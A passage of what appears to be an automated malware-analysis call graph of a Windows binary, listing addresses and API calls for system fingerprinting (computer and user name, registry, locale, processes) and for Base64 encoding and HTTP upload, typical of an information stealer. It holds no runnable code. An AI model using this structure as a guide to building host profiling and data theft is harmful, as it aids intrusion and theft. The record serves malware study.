lstrcpyA 13333->13358 13359 4131e0 lstrcpyA 13333->13359 13334->13333 13334->13344 13336 411550 2 API calls 13335->13336 13336->13333 13342 413360 strtok_s 13337->13342 13337->13344 13338->13342 13338->13344 13339->13342 13339->13344 13340->13342 13340->13344 13341->13342 13341->13344 13342->13344 13345 4134f6 13342->13345 13343 410240 2 API calls 13343->13344 13344->12578 13344->13337 13344->13338 13344->13339 13344->13340 13344->13341 13344->13342 13344->13343 13347 4134b3 StrCmpCA 13344->13347 13348 413452 StrCmpCA 13344->13348 13349 413475 StrCmpCA 13344->13349 13350 413494 StrCmpCA 13344->13350 13351 41342f StrCmpCA 13344->13351 13345->12578 13346->13333 13347->13344 13348->13342 13348->13344 13349->13344 13350->13344 13351->13342 13351->13344 13352->13333 13353->13333 13354->13333 13355->13333 13356->13333 13357->13333 13358->13333 13359->13333 13883 410530 13360->13883 13362 412c59 strtok_s 13363 412d34 13362->13363 13365 412c74 13362->13365 13363->12592 13364 412cf0 StrCmpCA 13364->13365 13365->13364 13366 410240 lstrlenA lstrcpyA 13365->13366 13367 412ca5 strtok_s 13365->13367 13366->13365 13367->13363 13367->13365 13369 4101c0 lstrcpyA 13368->13369 13370 413528 13369->13370 13371 410340 3 API calls 13370->13371 13372 413538 13371->13372 13373 410290 lstrcpyA 13372->13373 13374 413540 13373->13374 13375 410340 3 API calls 13374->13375 13376 413555 13375->13376 13377 410290 lstrcpyA 13376->13377 13378 41355d 13377->13378 13379 410340 3 API calls 13378->13379 13380 413571 13379->13380 13381 410290 lstrcpyA 13380->13381 13382 413579 13381->13382 13383 410340 3 API calls 13382->13383 13384 41358d 13383->13384 13385 410290 lstrcpyA 13384->13385 13386 413595 13385->13386 13387 410340 3 API calls 13386->13387 13388 4135a9 13387->13388 13389 410290 lstrcpyA 13388->13389 13390 4135b1 13389->13390 13884 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13390->13884 13392 4135bd 13393 410340 3 API calls 13392->13393 13394 4135c6 13393->13394 13395 410290 lstrcpyA 13394->13395 13396 4135ce 13395->13396 13397 410340 3 API calls 13396->13397 13398 4135e2 13397->13398 13399 410290 lstrcpyA 13398->13399 13400 4135ea 13399->13400 13401 410340 3 API calls 13400->13401 13402 4135fe 13401->13402 13403 410290 lstrcpyA 13402->13403 13404 413606 13403->13404 13885 411120 RegOpenKeyExA 13404->13885 13406 413612 13407 410340 3 API calls 13406->13407 13408 41361b 13407->13408 13409 410290 lstrcpyA 13408->13409 13410 413623 13409->13410 13411 410340 3 API calls 13410->13411 13412 413637 13411->13412 13413 410290 lstrcpyA 13412->13413 13414 41363f 13413->13414 13415 410340 3 API calls 13414->13415 13416 413653 13415->13416 13417 410290 lstrcpyA 13416->13417 13418 41365b 13417->13418 13419 410700 7 API calls 13418->13419 13420 41366b 13419->13420 13421 4102e0 2 API calls 13420->13421 13422 413674 13421->13422 13423 410290 lstrcpyA 13422->13423 13424 41367c 13423->13424 13425 410340 3 API calls 13424->13425 13426 413697 13425->13426 13427 410290 lstrcpyA 13426->13427 13428 41369f 13427->13428 13429 410340 3 API calls 13428->13429 13430 4136b3 13429->13430 13431 410290 lstrcpyA 13430->13431 13432 4136bb 13431->13432 13433 410540 14 API calls 13432->13433 13434 4136c8 13433->13434 13435 4102e0 2 API calls 13434->13435 13436 4136d1 13435->13436 13437 410290 lstrcpyA 13436->13437 13438 4136d9 13437->13438 13439 410340 3 API calls 13438->13439 13440 4136f4 13439->13440 13441 410290 lstrcpyA 13440->13441 13442 4136fc 13441->13442 13443 410340 3 API calls 13442->13443 13444 413710 13443->13444 13445 410290 lstrcpyA 13444->13445 13446 413718 13445->13446 13447 41371f GetCurrentProcessId 13446->13447 13888 411cc0 OpenProcess 13447->13888 13450 4102e0 2 API calls 13451 413735 13450->13451 13452 410290 lstrcpyA 13451->13452 13453 41373d 13452->13453 13454 410340 3 API calls 13453->13454 13455 413758 13454->13455 13456 410290 lstrcpyA 13455->13456 13457 413760 13456->13457 13458 410340 3 API calls 13457->13458 13459 413774 13458->13459 13460 410290 lstrcpyA 13459->13460 13461 41377c 13460->13461 13462 410340 3 API calls 13461->13462 13463 413790 13462->13463 13464 410290 lstrcpyA 13463->13464 13465 413798 13464->13465 13466 410340 3 API calls 13465->13466 13467 4137ac 13466->13467 13468 410290 lstrcpyA 13467->13468 13469 4137b4 13468->13469 13893 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13469->13893 13472 410340 3 API calls 13473 4137c9 13472->13473 13474 410290 lstrcpyA 13473->13474 13475 4137d1 13474->13475 13476 410340 3 API calls 13475->13476 13477 4137e5 13476->13477 13478 410290 lstrcpyA 13477->13478 13479 4137ed 13478->13479 13480 410340 3 API calls 13479->13480 13481 413801 13480->13481 13482 410290 lstrcpyA 13481->13482 13483 413809 13482->13483 13901 411200 13483->13901 13486 4102e0 2 API calls 13487 41381f 13486->13487 13488 410290 lstrcpyA 13487->13488 13489 413827 13488->13489 13490 410340 3 API calls 13489->13490 13491 413842 13490->13491 13492 410290 lstrcpyA 13491->13492 13493 41384a 13492->13493 13494 410340 3 API calls 13493->13494 13495 41385e 13494->13495 13496 410290 lstrcpyA 13495->13496 13497 413866 13496->13497 13498 411200 lstrcpyA 13497->13498 13499 413873 13498->13499 13500 4102e0 2 API calls 13499->13500 13501 41387c 13500->13501 13502 410290 lstrcpyA 13501->13502 13503 413884 13502->13503 13504 410340 3 API calls 13503->13504 13505 41389f 13504->13505 13506 410290 lstrcpyA 13505->13506 13507 4138a7 13506->13507 13508 410340 3 API calls 13507->13508 13509 4138bb 13508->13509 13510 410290 lstrcpyA 13509->13510 13511 4138c3 13510->13511 13904 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13511->13904 13513 4138cf 13514 410340 3 API calls 13513->13514 13515 4138d8 13514->13515 13516 410290 lstrcpyA 13515->13516 13517 4138e0 13516->13517 13518 410340 3 API calls 13517->13518 13519 4138f4 13518->13519 13520 410290 lstrcpyA 13519->13520 13521 4138fc 13520->13521 13522 410340 3 API calls 13521->13522 13523 413910 13522->13523 13524 410290 lstrcpyA 13523->13524 13525 413918 13524->13525 13905 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13525->13905 13527 413924 13528 410340 3 API calls 13527->13528 13529 41392d 13528->13529 13530 410290 lstrcpyA 13529->13530 13531 413935 13530->13531 13532 410340 3 API calls 13531->13532 13533 413949 13532->13533 13534 410290 lstrcpyA 13533->13534 13535 413951 13534->13535 13536 410340 3 API calls 13535->13536 13537 413965 13536->13537 13538 410290 lstrcpyA 13537->13538 13539 41396d 13538->13539 13906 4110a0 7 API calls 13539->13906 13542 4102e0 2 API calls 13543 413983 13542->13543 13544 410290 lstrcpyA 13543->13544 13545 41398b 13544->13545 13546 410340 3 API calls 13545->13546 13547 4139a6 13546->13547 13548 410290 lstrcpyA 13547->13548 13549 4139ae 13548->13549 13550 410340 3 API calls 13549->13550 13551 4139c2 13550->13551 13552 410290 lstrcpyA 13551->13552 13553 4139ca 13552->13553 13909 4109f0 13553->13909 13556 4102e0 2 API calls 13557 4139e0 13556->13557 13558 410290 lstrcpyA 13557->13558 13559 4139e8 13558->13559 13560 410340 3 API calls 13559->13560 13561 413a03 13560->13561 13562 410290 lstrcpyA 13561->13562 13563 413a0b 13562->13563 13564 410340 3 API calls 13563->13564 13565 413a1f 13564->13565 13566 410290 lstrcpyA 13565->13566 13567 413a27 13566->13567 13927 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13567->13927 13569 413a33 13570 410340 3 API calls 13569->13570 13571 413a3c 13570->13571 13572 410290 lstrcpyA 13571->13572 13573 413a44 13572->13573 13574 410340 3 API calls 13573->13574 13575 413a58 13574->13575 13576 410290 lstrcpyA 13575->13576 13577 413a60 13576->13577 13578 410340 3 API calls 13577->13578 13579 413a74 13578->13579 13580 410290 lstrcpyA 13579->13580 13581 413a7c 13580->13581 13928 410990 GetProcessHeap HeapAlloc GetTimeZoneInformation 13581->13928 13584 410340 3 API calls 13585 413a91 13584->13585 13586 410290 lstrcpyA 13585->13586 13587 413a99 13586->13587 13588 410340 3 API calls 13587->13588 13589 413aad 13588->13589 13590 410290 lstrcpyA 13589->13590 13591 413ab5 13590->13591 13592 410340 3 API calls 13591->13592 13593 413ac9 13592->13593 13594 410290 lstrcpyA 13593->13594 13595 413ad1 13594->13595 13596 410340 3 API calls 13595->13596 13597 413ae5 13596->13597 13598 410290 lstrcpyA 13597->13598 13599 413aed 13598->13599 13931 410b30 GetProcessHeap HeapAlloc RegOpenKeyExA 13599->13931 13601 413af9 13602 410340 3 API calls 13601->13602 13603 413b02 13602->13603 13604 410290 lstrcpyA 13603->13604 13605 413b0a 13604->13605 13606 410340 3 API calls 13605->13606 13607 413b1e 13606->13607 13608 410290 lstrcpyA 13607->13608 13609 413b26 13608->13609 13610 410340 3 API calls 13609->13610 13611 413b3a 13610->13611 13612 410290 lstrcpyA 13611->13612 13613 413b42 13612->13613 13934 410be0 13613->13934 13616 410340 3 API calls 13617 413b57 13616->13617 13618 410290 lstrcpyA 13617->13618 13619 413b5f 13618->13619 13620 410340 3 API calls 13619->13620 13621 413b73 13620->13621 13622 410290 lstrcpyA 13621->13622 13623 413b7b 13622->13623 13624 410340 3 API calls 13623->13624 13625 413b8f 13624->13625 13626 410290 lstrcpyA 13625->13626 13627 413b97 13626->13627 13951 410ba0 GetSystemInfo wsprintfA 13627->13951 13629 413ba3 13630 410340 3 API calls 13629->13630 13631 413bac 13630->13631 13632 410290 lstrcpyA 13631->13632 13633 413bb4 13632->13633 13634 410340 3 API calls 13633->13634 13635 413bc8 13634->13635 13636 410290 lstrcpyA 13635->13636 13637 413bd0 13636->13637 13638 410340 3 API calls 13637->13638 13639 413be4 13638->13639 13640 410290 lstrcpyA 13639->13640 13641 413bec 13640->13641 13952 410cb0 GetProcessHeap HeapAlloc 13641->13952 13643 413bf8 13644 410340 3 API calls 13643->13644 13645 413c01 13644->13645 13646 410290 lstrcpyA 13645->13646 13647 413c09 13646->13647 13648 410340 3 API calls 13647->13648 13649 413c1d 13648->13649 13650 410290 lstrcpyA 13649->13650 13651 413c25 13650->13651 13652 410340 3 API calls 13651->13652 13653 413c39 13652->13653 13654 410290 lstrcpyA 13653->13654 13655 413c41 13654->13655 13955 410d30 13655->13955 13658 4102e0 2 API calls 13659 413c57 13658->13659 13660 410290 lstrcpyA 13659->13660 13661 413c5f 13660->13661 13662 410340 3 API calls 13661->13662 13663 413c7a 13662->13663 13664 410290 lstrcpyA 13663->13664 13665 413c82 13664->13665 13666 410340 3 API calls 13665->13666 13667 413c96 13666->13667 13668 410290 lstrcpyA 13667->13668 13669 413c9e 13668->13669 13960 410fe0 13669->13960 13671 413cab 13672 4102e0 2 API calls 13671->13672 13673 413cb4 13672->13673 13674 410290 lstrcpyA 13673->13674 13675 413cbc 13674->13675 13676 410340 3 API calls 13675->13676 13677 413cd7 13676->13677 13678 410290 lstrcpyA 13677->13678 13679 413cdf 13678->13679 13680 410340 3 API calls 13679->13680 13681 413cf3 13680->13681 13682 410290 lstrcpyA 13681->13682 13683 413cfb 13682->13683 13969 410d80 13683->13969 13686 4102e0 2 API calls 13687 413d16 13686->13687 13688 410290 lstrcpyA 13687->13688 13689 413d1e 13688->13689 13690 410d80 16 API calls 13689->13690 13691 413d37 13690->13691 13692 4102e0 2 API calls 13691->13692 13693 413d40 13692->13693 13694 410290 lstrcpyA 13693->13694 13695 413d48 13694->13695 13696 410340 3 API calls 13695->13696 13697 413d63 13696->13697 13698 410290 lstrcpyA 13697->13698 13699 413d6b 13698->13699 13700 413d8a lstrlenA 13699->13700 13701 413d97 13700->13701 13702 4101c0 lstrcpyA 13701->13702 13703 413da7 13702->13703 13704 410200 lstrcpyA 13703->13704 13705 413db3 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413dbf 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dcb 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413de1 13710->13711 13985 413e50 13711->13985 13713 413e0f 13713->12602 13715 40e806 13714->13715 13753 40e456 13714->13753 13716 410200 lstrcpyA 13715->13716 13717 40e81a 13716->13717 13719 410200 lstrcpyA 13717->13719 13718 40e4ad StrCmpCA 13718->13753 13720 40e829 13719->13720 13721 410200 lstrcpyA 13720->13721 13723 40e838 13721->13723 13722 40e5b3 StrCmpCA 13722->13753 13724 410200 lstrcpyA 13723->13724 13726 40e84e 13724->13726 13725 4101c0 lstrcpyA 13725->13753 14792 40d9c0 memset memset memset memset RegOpenKeyExA 13726->14792 13727 40e73a StrCmpCA 13727->13753 13729 410340 lstrlenA lstrcpyA lstrcatA 13729->13753 13730 40e86b 13731 410200 lstrcpyA 13730->13731 13733 40e87c 13731->13733 13732 4102e0 2 API calls 13732->13753 13734 410200 lstrcpyA 13733->13734 13735 40e887 13734->13735 13736 410200 lstrcpyA 13735->13736 13738 40e892 13736->13738 13737 410290 lstrcpyA 13737->13753 13739 410200 lstrcpyA 13738->13739 13740 40e8a8 13739->13740 14827 40de80 13740->14827 13741 410200 lstrcpyA 13741->13753 13745 40e91d StrCmpCA 13759 40e8c5 13745->13759 13746 40ea23 StrCmpCA 13746->13759 13747 40ec76 13748 4101c0 lstrcpyA 13748->13759 13749 40ebaa StrCmpCA 13749->13759 13750 4102e0 2 API calls 13750->13759 13751 410340 lstrlenA lstrcpyA lstrcatA 13751->13759 13752 410290 lstrcpyA 13752->13759 13753->13715 13753->13718 13753->13722 13753->13725 13753->13727 13753->13729 13753->13732 13753->13737 13753->13741 14497 40b0f0 13753->14497 14573 40b4e0 13753->14573 14730 40cdf0 13753->14730 13754 40b0f0 443 API calls 13754->13759 13756 40cdf0 61 API calls 13756->13759 13757 410200 lstrcpyA 13757->13759 13758 40b4e0 444 API calls 13758->13759 13759->13745 13759->13746 13759->13747 13759->13748 13759->13749 13759->13750 13759->13751 13759->13752 13759->13754 13759->13756 13759->13757 13759->13758 13761 410409 13760->13761 13762 4103b2 13760->13762 13763 4103d7 lstrcpyA 13762->13763 13764 4103c9 13762->13764 13763->13764 13764->12850 13766 410200 lstrcpyA 13765->13766 13767 416930 13766->13767 13768 410200 lstrcpyA 13767->13768 13769 416939 13768->13769 13809 404280 13769->13809 13771 416943 13772 4101c0 lstrcpyA 13771->13772 13773 416954 13772->13773 13835 410500 StrCmpCA 13773->13835 13775 41695c 13775->12886 13777 4169dd 13776->13777 13778 4101c0 lstrcpyA 13777->13778 13779 4169f1 13778->13779 13780 410200 lstrcpyA 13779->13780 13781 4169fa 13780->13781 13782 404280 21 API calls 13781->13782 13783 416a04 13782->13783 13784 410290 lstrcpyA 13783->13784 13785 416a11 13784->13785 13786 416a25 StrCmpCA 13785->13786 13787 416a35 13786->13787 13788 416abb 13786->13788 13790 416a45 lstrlenA 13787->13790 13789 4101c0 lstrcpyA 13788->13789 13803 416ac8 13789->13803 13791 416a51 13790->13791 13844 4115b0 13791->13844 13794 416a5c 13795 416a6c StrStrA 13794->13795 13796 416a7e 13795->13796 13795->13803 13798 416a8e lstrlenA 13796->13798 13797 4101c0 lstrcpyA 13797->13803 13848 411490 13798->13848 13801 416ab0 13805 4101c0 lstrcpyA 13801->13805 13802 416b28 13804 4101c0 lstrcpyA 13802->13804 13803->13797 13806 416ab9 13804->13806 13805->13806 13806->13803 13807->12868 13808->12886 13810 410200 lstrcpyA 13809->13810 13811 4042a9 13810->13811 13836 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13811->13836 13813 4042b3 13814 4101c0 lstrcpyA 13813->13814 13815 4042c2 13814->13815 13816 4042cf InternetOpenA StrCmpCA 13815->13816 13817 404302 InternetConnectA 13816->13817 13818 404444 13816->13818 13817->13818 13819 40433b HttpOpenRequestA 13817->13819 13822 4101c0 lstrcpyA 13818->13822 13820 404371 13819->13820 13821 40446b InternetCloseHandle 13819->13821 13823 404377 InternetSetOptionA 13820->13823 13824 40438d HttpSendRequestA HttpQueryInfoA 13820->13824 13821->13818 13830 404451 13822->13830 13823->13824 13825 4043c1 13824->13825 13826 40445c 13824->13826 13825->13826 13834 4043d2 13825->13834 13827 4101c0 lstrcpyA 13826->13827 13827->13830 13828 404477 InternetCloseHandle 13829 410200 lstrcpyA 13828->13829 13829->13830 13830->13771 13831 4043f0 InternetReadFile 13831->13828 13831->13834 13832 410340 3 API calls 13832->13834 13833 410290 lstrcpyA 13833->13834 13834->13828 13834->13831 13834->13832 13834->13833 13835->13775 13842 410530 13836->13842 13838 4028e9 lstrlenA 13843 410530 13838->13843 13840 4028f5 InternetCrackUrlA 13841 402903 13840->13841 13841->13813 13842->13838 13843->13840 13845 4115c2 13844->13845 13847 4115e2 13844->13847 13846 4115ce LocalAlloc 13845->13846 13845->13847 13846->13847 13847->13788 13847->13794 13849 41149b lstrlenA 13848->13849 13849->13801 13849->13802 13851 410720 13850->13851 13852 41079e 13850->13852 13853 4101c0 lstrcpyA 13851->13853 13854 4101c0 lstrcpyA 13852->13854 13855 410730 memset 13853->13855 13856 4107aa 13854->13856 13857 410754 13855->13857 13856->12915 13858 411e60 3 API calls 13857->13858 13859 410761 13858->13859 13860 410768 lstrcatA 13859->13860 13869 410230 13860->13869 13862 41077a lstrcatA 13863 41078d 13862->13863 13864 4101c0 lstrcpyA 13863->13864 13865 410795 13864->13865 13865->13856 13867 4101c0 lstrcpyA 13866->13867 13868 411e96 13867->13868 13868->12919 13870 410237 13869->13870 13870->13862 13871->13066 13872->13247 13873->13253 13875 4077b8 LocalAlloc 13874->13875 13877 40402f 13875->13877 13877->13110 13877->13112 13878->13272 13880 4101c0 lstrcpyA 13879->13880 13881 411597 13880->13881 13881->13292 13882->13313 13883->13362 13884->13392 13886 4111d5 RegCloseKey CharToOemA 13885->13886 13887 4111b8 RegQueryValueExA 13885->13887 13886->13406 13887->13886 13889 411d01 13888->13889 13890 411ce7 K32GetModuleFileNameExA CloseHandle 13888->13890 13891 4101c0 lstrcpyA 13889->13891 13890->13889 13892 411d0b 13891->13892 13892->13450 13894 410824 RegQueryValueExA 13893->13894 13895 41083d RegCloseKey 13893->13895 13894->13895 13896 41084c 13895->13896 13897 41089b 13896->13897 13898 41085b RegOpenKeyExA 13896->13898 13897->13472 13899 410890 RegCloseKey 13898->13899 13900 410877 RegQueryValueExA 13898->13900 13899->13897 13900->13899 13902 4101c0 lstrcpyA 13901->13902 13903 411211 13902->13903 13903->13486 13904->13513 13905->13527 13907 4101c0 lstrcpyA 13906->13907 13908 41110b 13907->13908 13908->13542 13910 4101c0 lstrcpyA 13909->13910 13911 410a0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 13910->13911 13912 410a3b GetLocaleInfoA 13911->13912 13926 410b0f 13911->13926 13913 410340 3 API calls 13912->13913 13916 410a64 13913->13916 13914 410b17 LocalFree 13915 410b1e 13914->13915 13915->13556 13917 410290 lstrcpyA 13916->13917 13918 410a6c 13917->13918 14001 411270 13918->14001 13920 410aa0 GetLocaleInfoA 13921 410340 3 API calls 13920->13921 13922 410a84 13921->13922 13922->13914 13922->13920 13923 410340 3 API calls 13922->13923 13924 410290 lstrcpyA 13922->13924 13925 411270 memset 13922->13925 13922->13926 13923->13922 13924->13922 13925->13922 13926->13914 13926->13915 13927->13569 13929 4109e5 13928->13929 13930 4109bd wsprintfA 13928->13930 13929->13584 13930->13929 13932 410b72 RegQueryValueExA 13931->13932 13933 410b8b RegCloseKey 13931->13933 13932->13933 13933->13601 13935 410c12 GetLogicalProcessorInformationEx 13934->13935 13936 410c36 13935->13936 13937 410c1f GetLastError 13935->13937 13938 410c97 13936->13938 13939 410c3d 13936->13939 13940 410c86 13937->13940 13941 410c2a 13937->13941 13942 4112b0 2 API calls 13938->13942 13947 4112b0 2 API calls 13939->13947 13946 4112b0 2 API calls 13940->13946 13948 410c95 13940->13948 13943 410c00 13941->13943 13942->13948 13943->13935 13943->13948 14004 4112e0 GetProcessHeap HeapAlloc 13943->14004 14005 4112b0 13943->14005 13946->13948 13949 410c6c 13947->13949 13948->13616 13949->13948 13950 410c70 wsprintfA 13949->13950 13950->13948 13951->13629 13953 411270 memset 13952->13953 13954 410cdf GlobalMemoryStatusEx wsprintfA 13953->13954 13954->13643 13956 4101c0 lstrcpyA 13955->13956 13957 410d4a 13956->13957 13958 410d70 13957->13958 13959 410240 2 API calls 13957->13959 13958->13658 13959->13958 13961 4101c0 lstrcpyA 13960->13961 13962 410ffd CreateToolhelp32Snapshot Process32First 13961->13962 13963 411021 Process32Next 13962->13963 13964 411084 CloseHandle 13962->13964 13963->13964 13967 411031 13963->13967 13964->13671 13965 410290 lstrcpyA 13965->13967 13966 410340 lstrlenA lstrcpyA lstrcatA 13966->13967 13967->13965 13967->13966 13968 411074 Process32Next 13967->13968 13968->13964 13968->13967 13970 4101c0 lstrcpyA 13969->13970 13971 410da4 RegOpenKeyExA 13970->13971 13972 410fcc 13971->13972 13973 410ddc RegEnumKeyExA 13971->13973 13972->13686 13974 410fbb RegCloseKey 13973->13974 13975 410e1e 13973->13975 13974->13972 13976 410e74 wsprintfA RegOpenKeyExA 13975->13976 13977 410fb1 RegCloseKey 13976->13977 13978 410eae RegQueryValueExA 13976->13978 13977->13974 13979 410e30 RegCloseKey RegEnumKeyExA 13978->13979 13980 410edb lstrlenA 13978->13980 13979->13974 13979->13976 13980->13979 13984 410eeb 13980->13984 13981 410f39 RegQueryValueExA 13981->13979 13981->13984 13982 410340 lstrlenA lstrcpyA lstrcatA 13982->13984 13983 410290 lstrcpyA 13983->13984 13984->13979 13984->13981 13984->13982 13984->13983 13986 413e69 13985->13986 13987 410290 lstrcpyA 13986->13987 13988 413eac 13987->13988 13989 410290 lstrcpyA 13988->13989 13990 413ee1 13989->13990 13991 410290 lstrcpyA 13990->13991 13992 413eef 13991->13992 13993 410290 lstrcpyA 13992->13993 13994 413efb 13993->13994 13995 413f0a Sleep 13994->13995 13998 413f17 13994->13998 13995->13994 13996 413f5a CreateThread WaitForSingleObject 13997 4101c0 lstrcpyA 13996->13997 14270 416ea0 13996->14270 14000 413f8b 13997->14000 13998->13996 14008 41e4c0 13998->14008 14000->13713 14002 411289 14001->14002 14003 411278 memset 14001->14003 14002->13922 14003->14002 14004->13943 14006 4112ba GetProcessHeap HeapFree 14005->14006 14007 4112cc 14005->14007 14006->14007 14007->13943 14009 41e4f0 14008->14009 14010 41e4c8 14008->14010 14009->13996 14011 41e4e8 14010->14011 14013 41dd60 14010->14013 14011->13996 14014 41dd75 14013->14014 14067 41dd82 14013->14067 14015 41dd91 lstrcpyA 14014->14015 14014->14067 14016 41ddd0 14015->14016 14015->14067 14017 41de32 strlen 14016->14017 14018 41de09 14016->14018 14020 41de17 14017->14020 14070 41d0c0 lstrlenA 14018->14070 14021 41def3 14020->14021 14022 41de6c 14020->14022 14025 41d590 14 API calls 14021->14025 14023 41de75 14022->14023 14024 41df04 14022->14024 14026 41df1f 14023->14026 14027 41de7e 14023->14027 14090 41d710 14024->14090 14033 41df02 14025->14033 14026->14067 14094 41d850 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14026->14094 14029 41dea8 CreateFileA 14027->14029 14027->14067 14031 41ded5 14029->14031 14029->14067 14081 41d590 14031->14081 14032 41df42 lstrcpyA lstrcpyA lstrlenA 14035 41df8c lstrcpyA 14032->14035 14036 41df7c lstrcatA 14032->14036 14033->14032 14033->14067 14096 41e500 14035->14096 14036->14035 14038 41dee5 CloseHandle 14038->14067 14067->14011 14072 41d0d5 14070->14072 14071 41d0f7 StrCmpCA 14073 41d17c 14071->14073 14074 41d109 StrCmpCA 14071->14074 14072->14071 14072->14073 14073->14020 14074->14073 14075 41d119 StrCmpCA 14074->14075 14075->14073 14076 41d129 StrCmpCA 14075->14076 14076->14073 14077 41d139 StrCmpCA 14076->14077 14077->14073 14078 41d149 StrCmpCA 14077->14078 14078->14073 14079 41d159 StrCmpCA 14078->14079 14079->14073 14080 41d169 StrCmpCA 14079->14080 14080->14073 14082 41d5d8 SetFilePointer 14081->14082 14083 41d5cc 14081->14083 14084 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14082->14084 14085 41d5ee 14082->14085 14083->14033 14083->14038 14087 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14084->14087 14231 41d190 GetFileInformationByHandle 14085->14231 14089 41d60a SetFilePointer 14089->14083 14091 41d769 14090->14091 14092 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14090->14092 14091->14092 14093 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14091->14093 14092->14033 14093->14092 14095 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14094->14095 14095->14033 14097 41d3f0 5 API calls 14096->14097 14098 41e521 14097->14098 14099 41d3f0 5 API calls 14098->14099 14100 41e530 14099->14100 14101 41d3f0 5 API calls 14100->14101 14102 41e543 14101->14102 14103 41d3f0 5 API calls 14102->14103 14104 41e552 14103->14104 14105 41d3f0 5 API calls 14104->14105 14106 41e568 14105->14106 14107 41d3f0 5 API calls 14106->14107 14108 41e57a 14107->14108 14109 41d3f0 5 API calls 14108->14109 14110 41e590 14109->14110 14111 41d3f0 5 API calls 14110->14111 14112 41e5a2 14111->14112 14113 41d3f0 5 API calls 14112->14113 14114 41e5b8 14113->14114 14115 41d3f0 5 API calls 14114->14115 14116 41e5ca 14115->14116 14117 41d3f0 5 API calls 14116->14117 14118 41e5e0 14117->14118 14119 41d3f0 5 API calls 14118->14119 14120 41e5f2 14119->14120 14121 41d3f0 5 API calls 14120->14121 14122 41e608 14121->14122 14123 41d3f0 5 API calls 14122->14123 14124 41e61a 14123->14124 14125 41d3f0 5 API calls 14124->14125 14126 41e630 14125->14126 14127 41d3f0 5 API calls 14126->14127 14128 41e642 14127->14128 14129 41d3f0 5 API calls 14128->14129 14130 41e658 14129->14130 14131 41d3f0 5 API calls 14130->14131 14132 41e66a 14131->14132 14133 41d3f0 5 API calls 14132->14133 14134 41e680 14133->14134 14135 41d3f0 5 API calls 14134->14135 14136 41e692 14135->14136 14137 41d3f0 5 API calls 14136->14137 14138 41e6a8 14137->14138 14139 41d3f0 5 API calls 14138->14139 14140 41e6ba 14139->14140 14141 41d3f0 5 API calls 14140->14141 14142 41e6d0 14141->14142 14143 41d3f0 5 API calls 14142->14143 14144 41e6e2 14143->14144 14145 41d3f0 5 API calls 14144->14145 14232 41d29a 14231->14232 14233 41d1af GetFileSize 14231->14233 14232->14083 14232->14089 14234 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 14233->14234 14238 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14233->14238 14235 41d243 14234->14235 14234->14238 14236 41d24e SetFilePointer ReadFile 14235->14236 14235->14238 14236->14238 14237 41d330 FileTimeToSystemTime 14237->14232 14238->14232 14238->14237 14281 410530 14270->14281 14272 416ebf lstrlenA 14273 416f9e 14272->14273 14277 416eca 14272->14277 14274 410200 lstrcpyA 14274->14277 14276 410290 lstrcpyA 14276->14277 14277->14274 14277->14276 14278 416f71 StrCmpCA 14277->14278 14282 403090 14277->14282 14278->14277 14279 416f81 14278->14279 14280 411270 memset 14279->14280 14280->14273 14281->14272 14283 4101c0 lstrcpyA 14282->14283 14284 4030b2 14283->14284 14285 410200 lstrcpyA 14284->14285 14286 4030c2 14285->14286 14287 402790 5 API calls 14286->14287 14288 4030d2 14287->14288 14487 4116b0 14288->14487 14290 403103 14291 403113 lstrlenA 14290->14291 14292 40311f 14291->14292 14293 4116b0 7 API calls 14292->14293 14294 40312e 14293->14294 14295 4101c0 lstrcpyA 14294->14295 14296 40313d 14295->14296 14297 4101c0 lstrcpyA 14296->14297 14298 40314a 14297->14298 14299 4101c0 lstrcpyA 14298->14299 14300 403157 14299->14300 14301 4101c0 lstrcpyA 14300->14301 14302 403164 StrCmpCA 14301->14302 14303 4031ab 14302->14303 14304 40317e 14302->14304 14305 4113b0 4 API calls 14303->14305 14306 40318c InternetOpenA 14304->14306 14307 4031b9 14305->14307 14306->14303 14317 40386c 14306->14317 14308 4102e0 2 API calls 14307->14308 14309 4031c8 14308->14309 14310 410290 lstrcpyA 14309->14310 14311 4031d0 14310->14311 14312 410340 3 API calls 14311->14312 14313 4031f2 14312->14313 14314 4102e0 2 API calls 14313->14314 14315 4031fe 14314->14315 14316 410340 3 API calls 14315->14316 14318 40320b 14316->14318 14319 410200 lstrcpyA 14317->14319 14320 410290 lstrcpyA 14318->14320 14329 4038ae 14319->14329 14321 403214 14320->14321 14322 410340 3 API calls 14321->14322 14323 403239 14322->14323 14324 4102e0 2 API calls 14323->14324 14325 403245 14324->14325 14326 410290 lstrcpyA 14325->14326 14327 40324d 14326->14327 14328 40325e InternetConnectA 14327->14328 14328->14317 14330 40329e HttpOpenRequestA 14328->14330 14329->14277 14331 403865 InternetCloseHandle 14330->14331 14332 4032db 14330->14332 14331->14317 14333 403300 14332->14333 14334 4032e8 InternetSetOptionA 14332->14334 14335 410340 3 API calls 14333->14335 14334->14333 14336 403310 14335->14336 14337 410290 lstrcpyA 14336->14337 14338 403318 14337->14338 14339 4102e0 2 API calls 14338->14339 14340 40332b 14339->14340 14341 410290 lstrcpyA 14340->14341 14342 403333 14341->14342 14343 410340 3 API calls 14342->14343 14344 403347 14343->14344 14345 410290 lstrcpyA 14344->14345 14488 4116c2 14487->14488 14489 411727 14487->14489 14488->14489 14490 4116d6 CryptBinaryToStringA 14488->14490 14489->14290 14490->14489 14491 4116f3 GetProcessHeap RtlAllocateHeap 14490->14491 14491->14489 14492 41170e CryptBinaryToStringA 14491->14492 14492->14489 14493 411733 GetLastError GetProcessHeap HeapFree 14492->14493 